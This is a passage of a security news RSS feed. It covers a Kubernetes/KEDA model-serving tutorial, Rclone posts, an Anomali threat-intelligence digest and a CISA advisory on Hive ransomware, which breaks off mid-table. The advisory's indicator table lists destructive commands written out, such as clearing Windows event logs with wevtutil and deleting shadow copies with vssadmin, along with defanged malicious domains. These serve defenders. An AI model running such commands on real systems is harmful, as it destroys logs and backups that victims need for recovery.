href="https://keda.sh/docs/2.9/scalers/">here</a>. We’ll set up KEDA to fetch metrics from a Prometheus server, and monitor the metrics to trigger pod scaling. The Prometheus server collects metrics from Seldon deployments in the cluster.</p><h4>Install Seldon Monitoring and KEDA</h4><p>Follow this <a href="https://docs.seldon.io/projects/seldon-core/en/latest/analytics/analytics.html">instruction</a> to install Seldon’s stack for monitoring, which includes a Prometheus server. The following pods should now be present in the seldon-monitoring namespace:</p><pre>kubectl get pods -n seldon-monitoring<br># NAME                                                    READY   STATUS    RESTARTS     AGE<br># alertmanager-seldon-monitoring-alertmanager-0           2/2     Running   3 (8h ago)   26h<br># prometheus-seldon-monitoring-prometheus-0               2/2     Running   2 (8h ago)   26h<br># seldon-monitoring-blackbox-exporter-dbbcd845d-qszj8     1/1     Running   1 (8h ago)   26h<br># seldon-monitoring-kube-state-metrics-7588b77796-nrd9g   1/1     Running   1 (8h ago)   26h<br># seldon-monitoring-node-exporter-fmlh6                   1/1     Running   1 (8h ago)   26h<br># seldon-monitoring-operator-6dc8898f89-fkwx8             1/1     Running   1 (8h ago)   26h</pre><p>Check if the pod monitor for Seldon Core has been created:</p><pre>kubectl get PodMonitor -n seldon-monitoring<br># NAME                AGE<br># seldon-podmonitor   26h</pre><p>Run the following command to enable KEDA in Seldon Core:</p><pre>helm upgrade seldon-core seldon-core-operator \<br>    --repo https://storage.googleapis.com/seldon-charts \<br>    --set keda.enabled=true \<br>    --set usageMetrics.enabled=true \<br>    --set istio.enabled=true \<br>    --namespace seldon-system</pre><p>Install KEDA to the cluster, and make sure that the previously installed KEDA (if any) is completely uninstalled:</p><pre>kubectl delete -f https://github.com/kedacore/keda/releases/download/v2.9.1/keda-2.9.1.yaml<br>kubectl apply -f https://github.com/kedacore/keda/releases/download/v2.9.1/keda-2.9.1.yaml</pre><h3>Deploy models with KEDA</h3><p>We’ve had everything set up. Let’s create a Seldon deployment with KEDA. Similar to HPA, to enable KEDA in a deployment, we only need to include kedaSpec in the deployment's manifest. Consider the following spec:</p><pre>kedaSpec:<br>  pollingInterval: 15<br>  minReplicaCount: 1<br>  maxReplicaCount: 2<br>  triggers:<br>  - type: prometheus<br>    metadata:<br>      serverAddress: http://seldon-monitoring-prometheus.seldon-monitoring.svc.cluster.local:9090<br>      metricName: access_frequency<br>      threshold: '20'<br>      query: avg(rate(seldon_api_executor_client_requests_seconds_count{deployment_name=~"cifar10"}[1m]))</pre><p>serverAddress is the address of the Prometheus server within the cluster, it should be the URL of the Prometheus service, we can check the service with kubectl get svc -n seldon-monitoring. When the metric value surpasses threshold, the scaling will be triggered. The query is the average number of requests per second across running replicas, which is the metric we want to monitor.</p><p>Apply this <a href="https://github.com/tintn/ml-model-deployment-tutorials/blob/main/scalable-serving/cifar10-deploy-keda.yaml">manifest</a> to deploy the model:</p><pre>kubectl apply -f cifar10-deploy-keda.yaml</pre><p>Let’s trigger the autoscaling by sending requests to the deployment:</p><pre>locust -f test.py --headless -u 100 -r 10 --run-time 180 -H http://localhost:8080</pre><p>After a few seconds, you can see a new pod created:</p><pre>kubectl get pods<br># NAME                                                 READY   STATUS     RESTARTS      AGE<br># cifar10-default-0-cifar10-pytorch-5dc484599c-2zrv8   3/3     Running    3 (18m ago)   35h<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   0/3     Init:0/2   0             9s</pre><p>Similar to HPA, downscaling will be triggered after a certain period (5 minutes by default) of low traffic.</p><pre>kubectl get pods -w<br># NAME                                                 READY   STATUS    RESTARTS      AGE<br># cifar10-default-0-cifar10-pytorch-5dc484599c-2zrv8   3/3     Running   3 (22m ago)   35h<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   3/3     Running   0             3m55s<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   3/3     Terminating   0             5m49s<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   2/3     Terminating   0             6m<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   1/3     Terminating   0             6m1s<br># cifar10-default-0-cifar10-pytorch-5dc484599c-ljk74   0/3     Terminating   0             6m3s</pre><h3>Conclusion</h3><p>We’ve learned how to deploy machine learning models to Kubernetes clusters with Seldon Core. Although we mainly focused on deploying PyTorch models, the procedures shown in this guide may be used to deploy models from other frameworks.</p><p>We’ve also made the deployments scalable using HPA and KEDA. Compared to HPA, KEDA provides more flexible ways to scale the system based on Prometheus metrics (or other supported scalers from KEDA). Technically, we can implement any scaling rules from metrics that can be fetched from the Prometheus server.</p><p><em>Originally published at </em><a href="https://tintn.github.io/Scalable-Serving-with-Kubernetes-and-Seldon-Core/"><em>https://tintn.github.io</em></a><em> on January 9, 2023.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=37aec914c4d5" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/scalable-serving-with-kubernetes-and-seldon-core-a-tutorial-37aec914c4d5">Scalable Serving with Kubernetes and Seldon Core: A tutorial</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone (command-line program to manage files on cloud storage) 1.61 released]]></title>
<description><![CDATA[submitted by    /u/FryBoyter  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1741956/linux-tipps/rclone-command-line-program-to-manage-files-on-cloud-storage-161-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1741956/linux-tipps/rclone-command-line-program-to-manage-files-on-cloud-storage-161-released/</guid>
<pubDate>Wed, 21 Dec 2022 16:02:15 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/FryBoyter"> /u/FryBoyter </a> <br><span><a href="https://rclone.org/changelog/#v1-61-0-2022-12-20">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/zrntgd/rclone_commandline_program_to_manage_files_on/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone for syncing OneDrive and Sharepoint documents (review)?]]></title>
<description><![CDATA[Are there any users here that are using rclone to sync onedrive for personal & business and Sharepoint documents?  How has your experience been so far? Are you also using the rclone browser to manage your remotes? If you have experience with onedrive / sharepoint, then how does collaboration work...]]></description>
<link>https://tsecurity.de/de/1738298/linux-tipps/rclone-for-syncing-onedrive-and-sharepoint-documents-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1738298/linux-tipps/rclone-for-syncing-onedrive-and-sharepoint-documents-review/</guid>
<pubDate>Mon, 19 Dec 2022 09:45:18 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Are there any users here that are using rclone to sync onedrive for personal &amp; business and Sharepoint documents? </p> <p>How has your experience been so far? Are you also using the rclone browser to manage your remotes?</p> <p>If you have experience with onedrive / sharepoint, then how does collaboration work? (assuming 2-3 users need to collaborate on a document)</p> <p><em>I am a windows user now (for desktop), but planning to move back to linux but my work / school heavily relies on microsoft and I do collaborate on documents with colleagues &amp; classmates.</em></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/maverick6097"> /u/maverick6097 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/zplsr4/rclone_for_syncing_onedrive_and_sharepoint/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/zplsr4/rclone_for_syncing_onedrive_and_sharepoint/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anomali Cyber Watch: URI Fragmentation Used to Stealthily Defraud Holiday Shoppers, Lazarus and BillBug Stick to Their Custom Backdoors, Z-Team Turned Ransomware into Wiper, and More]]></title>
<description><![CDATA[The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Phishing, Ransomware, Signed malware, and Wipers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for po...]]></description>
<link>https://tsecurity.de/de/1703983/it-security-nachrichten/anomali-cyber-watch-uri-fragmentation-used-to-stealthily-defraud-holiday-shoppers-lazarus-and-billbug-stick-to-their-custom-backdoors-z-team-turned-ransomware-into-wiper-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1703983/it-security-nachrichten/anomali-cyber-watch-uri-fragmentation-used-to-stealthily-defraud-holiday-shoppers-lazarus-and-billbug-stick-to-their-custom-backdoors-z-team-turned-ransomware-into-wiper-and-more/</guid>
<pubDate>Wed, 23 Nov 2022 01:17:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>APT, Cyberespionage, Phishing, Ransomware, Signed malware,</b> and <b>Wipers</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p>

<p><img src="https://www.anomali.com/images/uploads/blog/acw-112222.png"><br><b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p>

<h2>Trending Cyber News and Threat Intelligence</h2>

<div class="trending-threat-article">
<h3><a href="https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/" target="_blank">DEV-0569 Finds New Ways to Deliver Royal Ransomware, Various Payloads</a></h3>

<p>(published: November 17, 2022)</p>

<p>From August to October, 2022, Microsoft researchers detected new campaigns by a threat group dubbed DEV-0569. For delivery, the group alternated between delivering malicious links by abusing Google Ads for malvertising and by using contact forms on targeted organizations’ public websites. Fake installer files were hosted on typosquatted domains or legitimate repositories (GitHub, OneDrive). First stage was user-downloaded, signed MSI or VHD file (BatLoader malware), leading to second stage payloads such as BumbleBee, Gozi, Royal Ransomware, or Vidar Stealer.<br><b>Analyst Comment:</b> DEV-0569 is a dangerous group for its abuse of legitimate services and legitimate certificates. Organizations should consider educating and limiting their users regarding software installation options. Links from alternative incoming messaging such as from contact forms should be treated as thorough as links from incoming email traffic.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/947205" target="_blank">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a> | <a href="https://ui.threatstream.com/ttp/3906161" target="_blank">[MITRE ATT&amp;CK] Command and Scripting Interpreter - T1059</a> | <a href="https://ui.threatstream.com/ttp/3905778" target="_blank">[MITRE ATT&amp;CK] Impair Defenses - T1562</a> | <a href="https://ui.threatstream.com/ttp/2402531" target="_blank">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br><b>Tags:</b> actor:DEV-0569, detection:Cobalt Strike, detection:Royal, malware-type:Ransomware, file-type:VHD, detection:NSudo, malware-type:Hacktool, detection:IcedID, Google Ads, Keitaro, Traffic distribution system, detection:Gozi, detection:BumbleBee, NirCmd, detection:BatLoader, malware-type:Loader, detection:Vidar, malware-type:Stealer, AnyDesk, GitHub, OneDrive, PowerShell, Phishing, SEO poisoning, TeamViewer, Adobe Flash Player, Zoom, Windows</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment#iocs" target="_blank">Highly Sophisticated Phishing Scams Are Abusing Holiday Sentiment</a></h3>

<p>(published: November 16, 2022)</p>

<p>From mid-September 2022, a new phishing campaign targets users in North America with holiday special pretenses. It impersonated a number of major brands including Costco, Delta Airlines, Dick's, and Sam's Club. Akamai researchers analyzed techniques that the underlying sophisticated phishing kit was using. For defense evasion and tracking, the attackers used URI fragmentation. They were placing target-specific tokens after the URL fragment identifier (a hash mark, aka HTML anchor). The value was used by a JavaScript code running on the victim’s browser to reconstruct the redirecting URL.<br><b>Analyst Comment:</b> Evasion through URI fragmentation hides the token value from traffic inspection tools because it is not being sent to the server. Users are advised to double-check domains that are asking for a payment or personal information. Learn the signs of an advanced-fee scam. Organizations are invited to try Anomali Premium Digital Risk Protection to detect abuse of their brands.<br><b>Tags:</b> Costco, Delta Airlines, Dick's, Sam's Club, target-region:North America, USA, target-country:US, Canada, target-country:CA, Phishing, JavaScript, Redirect, Credit card data, Advanced fee, Fraud</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://securelist.com/dtrack-targeting-europe-latin-america/107798/" target="_blank">DTrack Activity Targeting Europe and Latin America</a></h3>

<p>(published: November 15, 2022)</p>

<p>Since 2019, North Korea-sponsored Lazarus Group has used the DTrack backdoor to enable discovery, lateral movement, and stealing sensitive information. In 2022, DTrack was seen in a wider range of attacks targeting Brazil, Germany, India, Italy, Mexico, Saudi Arabia, Switzerland, Turkey, and the United States. DTrack comes inside an executable, and there are three to four stages of decryption before the malware payload starts. First stage retrieves the second stage from the inside of the malware PE file using either offset-based or resource-based approaches. After being decrypted and executed, this heavily-obfuscated shellcode decrypts the next eight bytes after the final payload decryption key, to discover payload size and its entry point offset.<br><b>Analyst Comment:</b> Organizations are advised to block known DTrack C2 domains (available in the Anomali platform).<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947235" target="_blank">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a> | <a href="https://ui.threatstream.com/ttp/947243" target="_blank">[MITRE ATT&amp;CK] Input Capture - T1056</a> | <a href="https://ui.threatstream.com/ttp/947135" target="_blank">[MITRE ATT&amp;CK] Data from Local System - T1005</a><br><b>Tags:</b> mitre-group:Lazarus Group, detection:DTrack, target-region:Europe, target-region:Latin America, USA, target-country:US, target-country:BR, target-country:DE, target-country:IN, target-country:IT, target-country:MX, target-country:SA, target-country:CH, North Korea, source-country:KP, APT</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://symantec-enterprise-blogs.security.com/threat-intelligence/espionage-asia-governments-cert-authority" target="_blank">Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries</a></h3>

<p>(published: November 15, 2022)</p>

<p>Symantec researchers detected a new campaign by China-sponsored cyberespionage group Billbug (aka Thrip, Lotus Blossom, Spring Dragon). Starting in March 2022, the group targeted a certificate authority in Asia and a number of government and defense agencies across various countries in Asia. The group was using its custom backdoors first detected in 2019: Hannotog and Sagerunex, as well as a large number of publicly-available tools: AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Tracert, Winmail, and WinRAR.<br><b>Analyst Comment:</b> Network defenders should plan for detecting anomalous behavior from signed but malicious binaries. Certificate authorities should be regarded as a critical target and be protected as such using the defense-in-depth approach.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a> | <a href="https://ui.threatstream.com/ttp/947235" target="_blank">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/3905359" target="_blank">[MITRE ATT&amp;CK] Proxy - T1090</a> | <a href="https://ui.threatstream.com/ttp/947187" target="_blank">[MITRE ATT&amp;CK] System Network Configuration Discovery - T1016</a> | <a href="https://ui.threatstream.com/ttp/2402535" target="_blank">[MITRE ATT&amp;CK] Service Stop - T1489</a><br><b>Tags:</b> actor:Billbug, mitre-group:Lotus Blossom, actor:Thrip, actor:Spring Dragon, China, source-country:CN, target-region:Asia, detection:Sagerunex, malware-type:Backdoor, detection:Hannotog, malware-type:Loader, detection:Stowaway Proxy Tool, AdFind, Winmail, WinRAR, Ping, Tracert, Route, NBTscan, Certutil, Port Scanner</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://www.infosecurity-magazine.com/news/ukrainian-cert-datawiping/" target="_blank">Ukrainian CERT Discloses New Data-Wiping Campaign</a></h3>

<p>(published: November 14, 2022)</p>

<p>Computer Emergency Response Team (CERT) reported a new data-wiping campaign that affected several Ukrainian organizations since spring 2022. The responsible group UAC-0118 (self-named as “From Russia with Love”, FRwL, and Z-Team) has been using a modified version of the Somnia ransomware that does not provide for the possibility of data decryption. It is likely that UAC-0118 has been acquiring access from another threat group (an initial access broker). Employees were targeted to download bogus software that led to the Vidar stealer installation. The victim's Telegram was used to transfer VPN connection configuration files (including certificates and authentication data) to users. The attackers used a number of tools for lateral movement and data exfiltration: Anydesk, Cobalt Strike Beacon, Netscan, Ngrok, and Rclone.<br><b>Analyst Comment:</b> Organizations with exposure to the military conflict in Ukraine should prepare offline backups to minimize the effects of a potential data-wiping attack. Indicators associated with the UAC-0118 activity are available in the Anomali platform and customers are advised to block these on their infrastructure.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947205" target="_blank">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a> | <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a> | <a href="https://ui.threatstream.com/ttp/3905087" target="_blank">[MITRE ATT&amp;CK] Disk Wipe - T1561</a><br><b>Tags:</b> actor:UAC-0118, actor:From Russia with Love, actor:FRwL, actor:Z-Team, detection:Somnia, malware-type:Wiper, Russia, source-country:RU, Ukraine, target-country:UA, Anydesk, detection:Cobalt Strike Beacon, Netscan, Ngrok, Rclone, Windows</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AA22-321A: #StopRansomware: Hive Ransomware]]></title>
<description><![CDATA[Original release date: November 17, 2022SummaryActions to Take Today to Mitigate Cyber Threats from Ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Enable and enforce multifactor authentication with strong passwords
• Close unused ports and remove any application not deeme...]]></description>
<link>https://tsecurity.de/de/1698923/sicherheitsluecken/aa22-321a-stopransomware-hive-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1698923/sicherheitsluecken/aa22-321a-stopransomware-hive-ransomware/</guid>
<pubDate>Thu, 17 Nov 2022 20:49:43 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Original release date: November 17, 2022<br><h3>Summary</h3><p class="tip-intro"><b>Actions to Take Today to Mitigate Cyber Threats from Ransomware:</b><br><br>
• Prioritize remediating <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>.<br>
• Enable and enforce multifactor authentication with strong passwords<br>
• Close unused ports and remove any application not deemed necessary for day-to-day operations.</p>

<p><em>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>

<p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.</p>

<p>FBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.</p>

<p>Download the PDF version of this report: <a href="https://us-cert.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf">pdf, 852.9 kb</a>.</p>
<h3>Technical Details</h3><p><em>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 12. See <a href="https://attack.mitre.org/versions/v12/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a> for all referenced tactics and techniques.</em></p>

<p>As of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).</p>

<p>The method of initial intrusion will depend on which affiliate targets the network. Hive actors have gained initial access to victim networks by using single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [<a href="https://attack.mitre.org/versions/v12/techniques/T1133/">T1133</a>]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12812">CVE-2020-12812</a>. This vulnerability enables a malicious cyber actor to log in without a prompt for the user’s second authentication factor (FortiToken) when the actor changes the case of the username.</p>

<p>Hive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [<a href="https://attack.mitre.org/versions/v12/techniques/T1566/001/">T1566.001</a>] and by exploiting the following vulnerabilities against Microsoft Exchange servers [<a href="https://attack.mitre.org/versions/v12/techniques/T1190/">T1190</a>]:</p>

<ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-31207">CVE-2021-31207</a> - Microsoft Exchange Server Security Feature Bypass Vulnerability</li>
	<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34473">CVE-2021-34473</a> - Microsoft Exchange Server Remote Code Execution Vulnerability</li>
	<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34523">CVE-2021-34523</a> - Microsoft Exchange Server Privilege Escalation Vulnerability</li>
</ul><p>After gaining access, Hive ransomware attempts to evade detention by executing processes to:</p>

<ul><li>Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [<a href="https://attack.mitre.org/versions/v12/techniques/T1562/001/">T1562</a>].</li>
	<li>Stop the volume shadow copy services and remove all existing shadow copies via <line>vssadmin</line> on command line or via PowerShell [<a href="https://attack.mitre.org/versions/v12/techniques/T1059/">T1059</a>] [<a href="https://attack.mitre.org/versions/v12/techniques/T1490/">T1490</a>].</li>
	<li>Delete Windows event logs, specifically the System, Security and Application logs [<a href="https://attack.mitre.org/versions/v12/techniques/T1070/">T1070</a>].</li>
</ul><p>Prior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [<a href="https://attack.mitre.org/versions/v12/techniques/T1112/">T1112</a>].</p>

<p>Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service <line>Mega.nz</line> [<a href="https://attack.mitre.org/versions/v12/techniques/T1537/">T1537</a>]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.</p>

<p>During the encryption process, a file named <line>*.key</line> (previously <line>*.key.*</line>) is created in the root directory (<line>C:\</line> or <line>/root/</line>). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, <line>HOW_TO_DECRYPT.txt</line> is dropped into each affected directory and states the <line>*.key</line> file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [<a href="https://attack.mitre.org/versions/v12/techniques/T1486/">T1486</a>]. The ransom note contains a “sales department” <line>.onion</line> link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.</p>

<p>The ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, “HiveLeaks”, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).</p>
<img alt="" data-align="center" data-caption="&lt;em&gt;Figure 1: Sample Hive Ransom Note&lt;/em&gt;" data-entity-type="file" data-entity-uuid="d1b2986e-6ab4-424f-bb36-72b8d9e06b65" height="516" src="https://us-cert.cisa.gov/sites/default/files/publications/How%20to%20Decrypt.png" width="548"><p> </p>

<table align="center" border-collapse:collapse=" class=" table=""><caption><em>Table 1: Anonymous File Sharing Sites Used to Disclose Data</em></caption>
	<tbody><tr><td nowrap valign="bottom">
			<p align="center"><span><span><a name="_Hlk119335386">https://anonfiles[.]com</a></span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://mega[.]nz</span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://send.exploit[.]in</span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://ufile[.]io</span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://www.sendspace[.]com</span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://privatlab[.]net</span></span></p>
			</td>
		</tr><tr><td nowrap valign="bottom">
			<p align="center"><span><span>https://privatlab[.]com</span></span></p>
			</td>
		</tr></tbody></table><p> </p>

<p>Once the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.</p>

<p>Hive actors have been known to reinfect—with either Hive ransomware or another ransomware variant—the networks of victim organizations who have restored their network without making a ransom payment.</p>

<h4><strong>Indicators of Compromise</strong></h4>

<p>Threat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. See tables 2–3 below for IOCs obtained from FBI threat response investigations as recently as November 2022.</p>

<table align="center" class="Table" width="100%"><caption><em>Table 2: Known IOCs as of November 2022</em></caption>
	<tbody><tr><td>
			<p><span><span><b>Known IOCs - </b><b><span>Files</span></b></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>HOW_TO_DECRYPT.txt</span></span></span> typically in directories with encrypted files</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>*.key</span></span></span> typically in the root directory, i.e., <span class="TechTextChar"><span><span>C:\</span></span></span> or <span class="TechTextChar"><span><span>/root</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>hive.bat</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>shadow.bat </span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span><span>asq.r77vh0[.]pw</span></span></span></span> - Server hosted malicious HTA file</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span><span>asq.d6shiiwz[.]pw</span></span><span> -</span> Server referenced in malicious <span class="TechTextChar"><span><span>regsvr32</span></span></span> execution</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span><span>asq.swhw71un[.]pw</span></span><span> -</span> Server hosted malicious HTA file</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span><span>asd.s7610rir[.]pw</span></span> - Server hosted malicious HTA file</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Windows_x64_encrypt.dll</span></span></span> </span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Windows_x64_encrypt.exe</span></span></span> </span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Windows_x32_encrypt.dll</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Windows_x32_encrypt.exe</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Linux_encrypt</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>Esxi_encrypt</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><b><span>Known IOCs – Events </span></b></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span>System, Security and Application Windows event logs wiped</span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span>Microsoft Windows Defender AntiSpyware Protection disabled </span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span>Microsoft Windows Defender AntiVirus Protection disabled </span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span>Volume shadow copies deleted</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span>Normal boot process prevented</span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><b><span>Known IOCs – </span></b><b><span>Logged Processes</span></b></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>wevtutil.exe cl system</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>wevtutil.exe cl security</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>wevtutil.exe cl application</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
			<p><span><span><span class="TechTextChar"><span><span>vssadmin.exe delete shadows /all /quiet</span></span></span></span></span></p>
			</td>
		</tr><tr><td>
